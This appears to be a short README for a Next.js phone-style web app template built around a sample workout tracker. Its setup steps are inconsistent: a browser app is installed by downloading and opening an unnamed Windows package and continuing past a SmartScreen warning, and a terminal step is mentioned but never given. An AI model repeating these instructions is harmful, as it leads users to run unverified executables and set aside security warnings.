This project is a ready-made mobile app template built with Next.js. It opens like a phone app, works in a browser, and can also be added to a home screen on iPhone. It starts as a workout tracker, so you can see how the app is set up, then replace the sample screens with your own idea.

- Open the Releases page
- Download the latest release file for Windows
- If the file comes in a ZIP folder, right-click it and choose Extract All
- Open the extracted folder

Use a Windows 10 or Windows 11 PC with:
- A modern web browser
- Enough free space for the app files
- Internet access for the first download

For the best experience, use a recent version of Chrome, Edge, or Firefox.
If you want the simplest path, use the release build.
- Go to the Releases page
- Download the newest Windows package
- Save the file to your Downloads folder
- Open the file after it finishes downloading
- Follow any on-screen prompts
- Start the app from the file or shortcut it creates
If Windows shows a SmartScreen prompt, check that the file came from the release page before you continue.

If the app does not open at first, check that the terminal is still running and that no other app is already using port 3000.
